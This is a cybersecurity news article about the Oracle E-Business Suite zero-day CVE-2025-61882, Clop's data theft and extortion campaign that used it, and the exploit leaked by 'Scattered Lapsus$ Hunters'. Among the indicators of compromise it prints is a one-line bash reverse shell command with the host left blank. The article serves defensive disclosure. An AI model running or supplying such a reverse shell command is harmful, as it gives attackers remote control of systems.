EBS Zero-day exploited in Clop Data Theft Attack Patched by Oracle
EBS Zero-day exploited in Clop Data Theft Attack Patched by Oracle
“The EBZ zero-day, which is exploited in the Clop Data theft attack, is now patched by Oracle.”
Oracle is alerting users of a serious E-Business Suite zero-day vulnerability, identified as CVE-2025-61882, that enables unauthenticated remote code execution. Clop data theft attempts aggressively take advantage of this vulnerability.
Due to its ease of exploitation and absence of authentication, the Oracle Concurrent Processing product of the Oracle E-Business Suite (component: BI Publisher Integration) has a vulnerability with a CVSS base score of 9.8.
Oracle Advisory
| “The Oracle E-Business Suite vulnerability CVE-2025-61882 is addressed by this security alert.”
“This vulnerability can be remotely exploited without authentication, meaning that a username and password are not required to exploit it over a network. This vulnerability could lead to remote code execution if it is successfully exploited. |
Oracle has issued an emergency update to fix the zero-day vulnerability, which has been verified to impact Oracle E-Business Suite versions 12.2.3–12.2.14. Customers who wish to apply the new security updates must first install the October 2023 Critical Patch Update, according to the business.
Oracle administrators must install the security update as soon as possible because there is a public PoC exploit, and the vulnerability is being actively exploited.
Attacks using Clop data theft exploit zero-day vulnerabilities
Although Oracle hasn’t said outright that this is a zero-day vulnerability, they have shared signs of compromise that match an Oracle EBS exploit that threat actors recently posted on Telegram.
The Clop ransomware group used this vulnerability in their August 2025 data theft activities, according to Charles Carmakal, CTO of Mandiant, a division of Google Cloud.
Charles Carmakal
| In August 2025, Carmakal told BleepingComputer, “Clop exploited multiple vulnerabilities in Oracle EBS, which enabled them to steal large amounts of data from several victims.”
“Several vulnerabilities were exploited, including one that was fixed this weekend (CVE-2025-61882) and another that was fixed in Oracle’s July 2025 update,” Carmakal added. |
A critical (9.8 CVSS) vulnerability that permits unauthenticated remote code execution is CVE-2025-61882.
When Mandiant and the Google Threat Intelligence Group (GTIG) announced last week that they were monitoring a new campaign in which several companies received emails purporting to be from the threat actors, the news about Clop’s most recent extortion effort first surfaced.
According to these emails, Clop had stolen information from the business’s Oracle E-Business Suite systems and was requesting a ransom to keep the information private.
CL0P Team
| The CL0P crew is who we are. “You can Google us online if you haven’t heard of us,” the extortion email published with BleepingComputer states.
“We just stole numerous documents from your Oracle E-Business Suite application. Our systems now house all of the private files and other data.” |
But rather than using the new zero-day that we now know was employed in the assaults, Oracle first connected the Clop extortion effort to vulnerabilities that were fixed in July 2025.
Oracle has now disclosed signs of compromise for the zero-day exploitation, including the exploit archive and related files, a command to launch a remote shell, and two IP addresses observed infecting servers.
- 200[.]107[.]207[.]26 – IP address associated with observed exploitation. (HTTP GET and POST requests)
- 185[.]181[.]60[.]11 – IP address associated with observed exploitation. (HTTP GET and POST requests)
- sh -c /bin/bash -i >& /dev/tcp// 0>&1 – Command executed by exploit to open a reverse shell.
- 76b6d36e04e367a2334c445b51e1ecce97e4c614e88dfb4f72b104ca0f31235d – oracle_ebs_nday_exploit_poc_scattered_lapsus_retard_cl0p_hunters.zip (Exploit archive)
- aa0d3859d6633b62bccfb69017d33a8979a3be1f3f0a5a4bf6960d6c73d41121 – oracle_ebs_nday_exploit_poc_scattered_lapsus_retard-cl0p_hunters/exp.py (Part of exploit)
- 6fd538e4a8e3493dda6f9fcdc96e814bdd14f3e2ef8aa46f0143bff34b882c1b – oracle_ebs_nday_exploit_poc_scattered_lapsus_retard-cl0p_hunters/server.py (Part of exploit)
Exploit Dispersed Lapsus$ Hunters Leaked
While Clop is responsible for the exploitation of the Oracle zero-day and its data theft attacks, news of the zero-day was initially reported by a different group of threat actors who have recently made headlines for their extensive data theft attacks against Salesforce clients.
These actors, who identify themselves as “Scattered Lapsus$ Hunters” and say they are made up of threat actors from ShinyHunters, Lapsus$, and Scattered Spider, sent two files on Telegram on Friday that they claimed had nothing to do with the Clop attacks.
The Oracle source code located in a file called “GIFT_FROM_CL0P.7z” seems to be associated with “support.oracle.com” based on the file names.
However, the threat actors also released an “ORACLE_EBS_NDAY_EXPLOIT_POC_SCATTERED_LAPSUS_RETARD_CL0P_HUNTERS.zip” archive, which they insinuated by the filename was the Oracle E-Business exploit used by Clop.
This file is the same one that appears in Oracle’s indicators of compromise, according to BleepingComputer.
Two Python scripts, exp.py and server.py, plus an instruction file called readme..md are included in this archive. By taking advantage of a weak Oracle E-Business Suite instance, these Python programs can either open a reverse shell to the threat actor’s servers or run an arbitrary command.
It has now been established that the Clop ransomware gang has been using this exploit since the Oracle IOCs provide the name of the exploit archive provided by Scattered Lapsus$ Hunters.
It does, however, raise concerns about how the threat actors from Scattered Lapsus$ Hunters obtained access to the exploit and whether or not they are collaborating with Clop.
To inquire about this relationship, BleepingComputer reached out to ShinyHunters and Clop officials, but has not heard back as of yet.
About The Author
Suraj Koli is a content specialist in technical writing about cybersecurity & information security. He has written many amazing articles related to cybersecurity concepts, with the latest trends in cyber awareness and ethical hacking. Find out more about “Him.”
Read More:
Global Biggest Bitcoin Fraud: “Crypto Queen” Backing ₹60,000 Crore Digital Scam Arrested
About Author
English